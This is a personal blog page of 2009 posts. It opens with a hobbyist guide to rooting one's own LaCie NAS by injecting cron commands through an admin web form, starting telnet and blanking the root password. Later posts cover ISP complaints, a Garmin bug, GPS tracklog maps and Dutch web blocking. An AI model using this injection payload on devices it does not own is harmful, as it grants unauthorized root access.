Get a root shell on a Lacie Network Space device without physically opening the device

Posted on 2009-07-29 by Jeroen

About the NAS

LaCie Network Space

LaCie Network Space

I own a 1 TB Lacie Network Space device. This device, also called Network Attached Storage (NAS), enables you to hook it onto your (local) network and access files via file -and print sharing, ftp and other protocols. Very handy, if it works as you expect it to.
The NAS has an ARM926EJ-S processor, a 1TB hard disk, 16MB of memory, an USB port and no fan (which makes it pretty quiet).

Problem

My problem with the NAS is that the kernel running on the device starts killing processes when I copy very large (2 GB+) files to the NAS via file -and print-sharing (using the samba server). This broke my device in such a way that it would become unusable (no admin panel, though still pingable). Therefore I sent the device for RMA to Lacie’s service desk where it was repaired.
At least I thought it was, because after copying those large files again, the device broke again, but this time  I was luckily still able to reboot and keep the device up a little while before it required a new reboot. :|
The system log showed a kernel that was randomly killing processes. I expect this might be caused by the autoscan feature that indexes the media on the device, or maybe the device just doesn’t have enough memory to cope with the continuous transfer of big files. Not funny for a € 160,- device.

Getting root

I decided I didn’t want to submit the device for RMA again and wanted to get root access to the device and repair it (read: make it more stable) myself. However I didn’t want to physically open the device and void the warrant. Luckily you don’t have to, at least not when your device is running firmware 1.1.8, as I found out thanks to a post from user ‘hardel09′ (read here). You should only proceed when you understand what you are doing. If you do anything wrong, it can break your device.

Take the following steps:

  1. Save the content below to a HTML page, as it allows you to send commands that allow you to abuse cron for executing the tasks you want: 
    <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Hack the NAS</title>
</head>
<body>
<form name='edit_form' method='post' action='http://YOURDEVICE/cgi-bin/admin/media'>
<input type='hidden' id='autoscn' name='autoscn' value='true' />
<input type='hidden' id='modified' name='modified' value='true' />
<input name='hour' value='12'/><input name='minute' value='50 12 * * * chmod 755 /home/openshare/utelnetd; /home/openshare/utelnetd &'/>
<input type=submit value='SET CRONTAB'/>
</form></body>
</html>
  2. Change the YOURDEVICE in the HTML-file to use the right IP-address or hostname of the NAS
  3. Copy utelnetd to \\YOURDEVICE\openshare\utelnetd
  4. Open the HTML file with your favorite browser and fill the current hour in the hour input field and fill the minute input field with the value below. Change the “HOUR” string to the current hour and change the “MINUTE” string to the next minute plus 2 minutes or so (leaving existing spaces intact), assuming the time on your NAS is correctly set (if not, make it correct by using the admin panel). Now click the SET CRONTAB button and after a few seconds you should end up at the administrator media page with the autoscan checkbox selected. 
    MINUTE HOUR * * * chmod 755 /home/openshare/utelnetd;  /home/openshare/utelnetd &
  5. Now wait a few minutes, start you favorite network scanner tool and check if port 23 on the NAS has yet appeared as open. If this is not the case, try again from step 4.
  6. If so, you can almost log in, if you set a (empty) password for the root user. Get to the HTML page again, change the “MINUTE” and “HOUR” strings again (leaving existing spaces intact) and add a command that makes root’s password empty: 
    MINUTE HOUR * * * passwd -d root
  7. Login with user root via telnet to get your root shell:

    root shell

    root shell

  8. If you got a shell, congratulations, you did it! Now continue to make it permanent. Disable the cleanConf daemon, so your changes won’t be reversed when the NAS is rebooted: 
    cd /etc/rc.d/rc3.d
mkdir disabled
mv S12cleanConf disabled
  9. Fix the hacked crontab by executing the command below and clear the first line in the editor (which will disable autoscan) 
    crontab -e
  10. Copy /home/openshare/utelnetd to /usr/bin and make it executable: 
    cp /home/openshare/utelnetd /usr/bin
chmod 755 /usr/bin/utelnetd
  11. Add a script in /etc/init.d/telnetd for starting utelnetd automatically. Mine looks like this: 
    #!/bin/sh
# Begin $rc_base/init.d/telnetd
 
. /etc/sysconfig/rc
. $rc_functions
 
case "$1" in
        start)
                echo "Starting telnetd server..."
                /usr/bin/utelnetd &
                ;;
 
        stop)
                echo "Stopping telnetd server..."
 
                killall utelnetd
                ;;
        restart)
                $0 stop
                sleep 1
                $0 start
                ;;
 
        status)
                statusproc utelnetd
                ;;
 
        *)
                echo "Usage: $0 {start|stop|restart|status}"
                exit 1
                ;;
esac
 
# End $rc_base/init.d/telnetd
  12. Enable the script by making a symbolic link that points to the telnetd script: 
    cd /etc/rc.d/rc3.d
ln -s ../../init.d/telnetd S18telnetd
cd /etc/rc.d/rc6.d
ln -s ../../init.d/telnetd K12telnetd
  13. Make the script executable: 
    chmod +x /etc/init.d/telnetd

That’s it. You can now reboot the device and utelnetd is automatically started after the reboot.

Now we have root

So what can you do with the device now you have root access to it?

  • Secure it. Anyone in your network who can access the device via IP can currently connect to it without a password, so you might consider using openssh instead of telnet as described here. You might want to secure the /www/cgi-bin/admin/media script as well, as it can be easily used to hack into the device.
  • Fix other problems with the software on the NAS that bother you.
  • Mount (multiple) partitions from an external mass-storage device and make it available on the network.
  • Use it as bittorrent client.
  • Run other (light-weighted / self-compiled) applications on it.

I hope this has helped anyone in any way :)

Posted in Hardware, Linux | Tagged , , , , , | 60 Comments

Issues with Dutch cable provider UPC

Posted on 2009-07-05 by Jeroen

UPC unhappy logoUPC is a service provider for Internet, television and telephone in the Netherlands. I don’t like UPC and I’m going to tell you why. If you are not interested you can stop reading now, but I need to get this of my chest.


Why UPC is a bad service provider (in random order)…

  • Since recently, UPC forces non-resolving domain requests to their default(!) DNS servers with a request that resolves to a web page that 302 http redirects you to their own “search” engine. So if you mistype a domain name, your browser redirects you, thereby invading your privacy and providing you with their full-banner “helper”-webpage. This is against the DNS protocol.
    You can solve it by forcing your IP’s to use another set of DNS servers. For me this means I have to manually configure each network device because I cannot make my Thomson router distribute specific DNS host adresses via DHCP :(
    This site tells you more about the solution where you have to manually set your DNS servers.
  • I have a ‘royal subscription’ which means I get nine HD (High Definition) channels for 10 euro/month extra. UPC offers you another feature with this Royal subscription that is called Video On Demand (VOD). The feature is nice because they provide you with a lot of nice content (like series) that are watchable on demand, just like a dvd.
    The problem is that it  often doesn’t work for me, giving me a VOD 103 exception. I’ve contacted support three times now about this issue and they still haven’t manage to locate the problem. Every time I have to convince them my signal is ok (using a special test-channel). The problem is probably caused due to a under capacity at their streaming servers, but people at the support desk simply follow protocol and never find the problem so it never gets fixed.
  • I have a subscription where I have a combined box for telephone, internet (24 MBit) and (HD) television. I don’t want the phone, but I cannot just order only internet and television. I don’t want to pay for this crappy phone line that doesn’t allow me to dial +31(0)87 numbers (voip phone land-lines in the Netherlands). Another irritating issue is that when your broadband cable modem has no connection, people calling your number get a normal “phone is ringing”-tone on their side, and not a “number not reachable”-tone, which doesn’t help finding the problem.
    Besides that UPC tries to sell this product as a normal phone line, but instead it’s a very error-prone telephone line that you should not primarily rely on when you might need to call the alarm-number.
  • My (brand new) black colored ‘Media Box’ that provides me with HD television seems unstable. Sometimes – out of nothing – the screen just turns black, while sounds continues. Remote control activities don’t work any more and the device get’s locked. In this case the device needs a power-cable off and on, which costs me at least 60 seconds before the television get’s back. Not funny when you were watching ‘time shifted’.
    I’ve also seen issues where the device automatically switches to the (of all channels) interactive ‘UPC’ channel, functionally “disabling” the number pad on your remote control so it will take you some time to get back to the non-interactive TV channels, while losing ‘time-shifted’ data as well. The remote control is not the problem (I’m using the Logitech Harmony nowadays), and there are numerous people on forums complaining about issues with the UPC media devices as well.
    I’m silently hoping they push a ‘all-problems-fixing’-firmware update soon.
  • UPC poisons their DNS servers with a blacklist so they can block domains hosting child pornography. The problem with this is that they are not open about it, so they they manipulate your DNS requests without telling you about it. I wrote an article about that case specifically.
  • The Internet connection UPC provides is slow during evening hours and has connection dropouts very often. When I switch my Internet connection to another provider to check if it’s a local network issue, the connection is always back and better.
  • With my subscription, they do not allow me to pay ‘manually’ with so called ‘accept giros’, instead they forced my to use automatic credit payment where they are in complete control. So if they make a mistake, It’s up to me to get the money back. Isn’t this against the law?
  • UPC violates your privacy. When you keep your default password, they get it in clear text on their screen at the help desk. If you play it nice, they’ll tell it to you. This endangers your privacy because it is the password that is also used for the mail account they offer you and provides you access to their service center where you can order new services as well. Don’t use their mail account if you  are concerned about your privacy.
  • Something positive on the contrary is that they offer a very fast internet connection for almost the same price as you were already paying, an action that was just launched recently. The disadvantage of this is that their network gets more load, something that could explain the continuous connection drop-outs I’m continuously experiencing. They don’t seem to be prepared for Internet speed upgrades with their network.
  • When you call UPC on their special 0900-number, they charge a high price, especially when calling from a mobile phone. When you telephone line from UPC is dead, you cannot use their phone, so you are mostly stuck to a mobile phone.
    The high calling rate is not fancy, but I find it quite ok, because it prevents the waiting time due to customers only calling when they really have to. Still, their waiting time on average is too long, in my experience (> 5 minutes average).
    Besides that, when you call them, it takes you at least 2 minutes before you get through their menu, every time. Sigh.
    A refund for callers – if the problem is theirs – would be nice.
  • You cannot quit your contract with UPC whenever you want, you are stuck with them for at least one year. It’s not only UPC that plays this trick on you, their are other providers that do this to you as well.

So why do I still use UPC?

The reason for me still using UPC  is that they are the only provider offering HD television to my home. Besides that my ADSL line doesn’t seem to be capable for high speed Internet access (meaning 8 MBit+ downstream), and I want a reasonable upload speed as well.

If there is another provider for my region available that includes HD television and fast internet access, I’ll switch immediately.

Posted in Internet | Tagged , , , , , | 3 Comments

GPSMAP 60 Daylight Saving Time (DST) sunset time bug

Posted on 2009-04-15 by Jeroen
Garmin 60 'Sun and Moon' screen

Garmin 60 'Sun and Moon' screen

I’ve discovered an issue with my Garmin GPS 60 CSx that I currently cannot find described anywhere else. It’s about the ‘Sun and Moon’ screen that shows you the sunrise and sunset information for a certain date and and a certain location on earth, on a day where DST changes the time at night.
The problem seems to be that the DST is not taken into account when the GPS calculates the sunset and sunrise time for that day. The local time that is shown on the GPS device however is displayed correctly, so the DST change by itself seems to be working correctly.

Let me explain by giving an example…
We set the date to Sunday 29-MAR-09 which is the day that Western Europe switches from winter-time to summer-time at Sunday night from 2 AM to 3 AM (01:59:59 to 03:00:00 to be exact). At Saturday 28th, at any time, the sunset for that day is given at 19:04, which is correct. At Sunday 29th the sunset indicated on the GPS at 03:00 should be 20:06, but it’s not.
The next table should give an overview.

Location Date/Time Expected
sunset time		 Actual sunset
according to GPS
Amsterdam Friday 27-MAR-2009 12:00 19:03 19:03
Amsterdam Saturday 28-MAR-2009 12:00 19:04 19:04
Amsterdam Saturday 28-MAR-2009 23:59 19:04 19:04
Amsterdam Sunday 29-MAR-2009 00:00 19:06 19:06
Amsterdam Sunday 29-MAR-2009 01:59 19:06 19:06
Amsterdam Sunday 29-MAR-2009 03:00 20:06 19:06
Amsterdam Sunday 29-MAR-2009 16:00 20:06 19:06
Amsterdam Monday 30-MAR-2009 00:00 20:08 20:08

It seems that the current time is not taken into account when the GPS calculates the sunset and sunrise times, but only the date. This is OK, but not for dates where the time changes.

Report the bug
Does anyone now how tot get a bug like this fixed with Garmin? I don’t want to explicitly contact their support because it is just a minor issue, though I think it would be nice if it would be fixed.

Conclusion
So if you happen to be trusting your GPS to tell you when the sun rises and set’s like I do, beware that the time may be one our off on days where the clock is set back or forward (mostly Sunday), depending on whether you use DST. I’ve seen this issue with the Garmin GPS 60CSx running the currently latest firmware (3.70).

Update 2009-05-24:
I submitted the bug with Garmin and got a response:
Thanks for your email I will be happy to help. This is a bug that we have come across before from another customer. It only seems to appear when the time zone on the unit is set for Amsterdam. If the unit is set to the London time zone the Sunset error doesn’t appear. We will pass your comments onto our software team in the USA as his is something that could be fixed in a future software update but I cant promise you that it will be.

Seems like there is a chance that it will be fixed!

Posted in GPS | Tagged , , , , | Leave a comment

Using multiple GPS tracklogs to create artistic views in Google Earth

Posted on 2009-02-20 by Jeroen

Since June 2005, I’ve been collecting tracklog data using my Garmin GPS 60 (CSx). This means that every time I go cycle racing, walking, sailing, ice skating or even flying, I bring my Garmin, turn it on and (automatically) log the track.

After the track is completed for that activity, I archive it at home, as a GPX file, using Garmin’s MapSource.
I initially bought the GPS for tracklogging and navigational purposes for my bike trip from Arnhem (Netherlands) to Paris, but keeping all tracklogs did give me some other cool opportunity that I didn’t think of back then.
One example of that is gathering statistics about my cycleracing and mountainbiking trips, thereby motivating me to break new records and discover new terrain. Another cool purpose for all my tracklogs, and what this blog is about, is that I can visualize them (all at once) on Google Earth!

With Google Earth and converting tools like GPSBabel at our disposal, it’s possible to create a (big) Google Earth file of all tracklogs combined. When I try to combine, for example, the activities for which I have the most tracklogs available (cycle racing, mountainbiking, walking, cycling on my hybrid bike and sailing), I assign them a color so I can differentiate between different types of activities and create really cool and insightful maps, like this:

Combined tracklog view of the southern Veluwezoom area

In this picture, the red colored line stands for mountainbiking, purple stands for cycling with my hybrid bike, blue is used for cycle racing and green is for walking. If you look carefully, you can also guess where I must live somewhere :-)

This map might look not very organized or useful to other people, but for me, there are many, many stories and new ideas hidden in it.

There are a lot of interesting views possible, seen my pretty large collection of tracklogs. This one for example is from my holiday last September in and around Cassis (south France):

Combined tracklog from holiday in Cassis, France; viewed in Google Earth

The pink line show a sailing trip we’ve taken. The green line shows the walk we took to Calanque d’En-vau and the blue line shows a cycle racing trip over the Route du Crête. If you ever want to visit this area, it’s a good thing idea to take my tracklogs, put them on your GPS and do the activities while you are in the area, so you don’t miss the ‘must-have-done’s’.

This whole thing looks somewhat like everytrail.com, where one can create some sort of “trackblog”, including photo’s that can be linked to the track. But an overview, loadable in Google Earth is not one of the options they offer (yet). But maybe they add it in the future, so, if you start uploading your tracks at everytrail.com now, an easy total view in Google Earth might not be so far away at all :)

Luckily you can create such a combined track yourself as well, however it requires some scripting knowledge. To combine the (GPX) files you can use gpsbabel, remove all but the track-information from the tracklog, for each of the tracklogs from a certain category, and output them to a kml or kmz file, a command that looks like this on unix:

/usr/local/bin/gpsbabel -i gpx -f "Tracklogs Varen/20080611_Drangey_Sauðárkrókur.gpx" -x nuketypes,waypoints,routes -i gpx -f "Tracklogs Varen/20080611_Sauðárkrókur_Drangey.gpx" -x nuketypes,waypoints,routes -i gpx -f "Tracklogs Varen/20080824_RoelofarendsveenLeiden.gpx" -x nuketypes,waypoints,routes -i gpx -f "Tracklogs Varen/20080908_CalanqueDePortMiou.gpx" -x nuketypes,waypoints,routes -o kml,floating=0,labels=1,trackdata=1,line_color=FF00FF00,points=0,line_width=2 -F "combined_varen.kml"

After that I load each kml file in Google Earth separately and assign it a unique color. By moving the track to the same folder in Google Earth, I can combine them to one track, with multiple colors per category. That’s all it takes.

The most actual version of all my tracks in the categories cycleracing, ‘Cycleracing with hybrid bike’, sailing, mountainbiking, walking, ice skating and flying can be found in this automatically updated Kml file.

Some more screenshots that I’ve taken are available here: http://public.hendricksen.eu/GpsArt/

combined tracklog view of 'de Liemers'

I hope I can inspire people to do the same, or at least motivate them to start collecting and archiving their own tracklogs, so at some point, they can create some cool maps just like I did with my tracklogs, and who knows, maybe start comparing those tracks.

Update 2009-12-03:
The latest combined tracks file (automatically updated) with all my cycling, walking, sailing and skating tracklogs are available here.

Posted in Cycling, GPS, Hyves, Internet, LinkedIn | Tagged , , , , , , , , | 5 Comments

The blocking of child pornography in the Netherlands

Posted on 2009-01-02 by Jeroen

Internet censorship is a hot topic nowadays, even here in the Netherlands. A lot is written about the Dutch government trying to reduce the accessibility and distribution of child pornography over the Internet, which is in general a good thing. A bad thing, on the contrary, is the way in which they try to do that, knowing about the Great Firewall of China.

I, as a curious Dutch citizen want to test what my government is doing to my Internet accessibility, after hearing rumors of blocks being applied. And to be very honest, I am also interested in the technical solution.
So, where do you start if you want to test this? Well, not with a Dutch government site where the magic black list is hosted of course, but by just reading slashdot.org that links you (indirectly) to wikileaks.org where a list of pages blocked by the Danish government was posted:
https://secure.wikileaks.org/wiki/Denmark:_3863_sites_on_censorship_list%2C_Feb_2008
Gosh, I wonder if this list might point me to some sites that are blocked in the Netherlands as well…

So, I started looking up url’s in the list at random. Most of them appear to be bogus sites, captured by domain hijackers and filled with total nonsense. But after 10 clicks or so, I found a website that was blocked: www dot am using – ki ds dot com. When opening this site via Dutch ISP UPC, I find the page to be on the Dutch black list, resulting in a “STOP” warning, as you can see here:

stop_childporn

(the page doesn’t look very professional, which I think shows similarities with the technical solution that is used to block websites)

A remarkable thing is, that when I make a request for the site via dutch ISP XS4ALL, (I happen to have two Internet connections at my disposal) the site isn’t blocked at all. I know XS4ALL criticizes the way this filtering is implemented, but not blocking access to the site…
Well, it could be that they just have a more recent version of the black list already, who knows. But still, I’m curious whether other Dutch ISP’s like Tiscali, Planet, KPN and even SurfNet (a provider for educational and research facilities) block this site and others do not…

Above all of this, I very much agree child porn should be stopped because it harms innocent children, but not by bringing the Freedom of Speech of the Internet to a risk (which costs you a lot of effort anyway because of the nature of the Internet) while not solving the problem at all. If there has to be a black list for the common Internet surfer (by that I mean that it helps again child pornography), then so be it.
But why can’t it be an open list, a list that is verifiable by everyone on the world, and a list that is used onlyfor blocking what is considered real child pornography hosted on servers that cannot be taken down (because it is hosted in a country where the Dutch government has no jurisdiction). The list should not be abused for blocking anything else but child pornography.

This obvious risk here is that the owner of the list might abuse it for blocking content that is unrelated to child pornography, but for example (seemingly) illegal content (warez) or blog posts with undesirable political contents.

The problem with child pornography is way bigger then the Internet. Censoring the Internet in the current way it is done is not really going to do any good against child abusers. So why spend taxes on this solution that is probably not solving anything?

Access to whatever material cannot be blocked unless you apply strategies like described in Orwell’s 1984, where you have total control over people, where in this case you apply total control over the way in which the Internet can be accessed. The nature of the Internet makes this practically impossible without severely limiting ones freedom on the Internet, thus block a few sites by poisoning the ISP’s DNS server, like is currently done, is not going to work.

Governments should invest in catching the sick people creating and distributing the CP. As I see it, that is not done by obfuscating DNS request. IMHO the collateral damage violates the privacy and freedom of the common Internet user.

If you want to view the Dutch “STOP” website, you can just visit it:
http://212.142.48.139 (please note the stop sign, it animates, so cool)

Posted in Privacy | Tagged , , , , | Leave a comment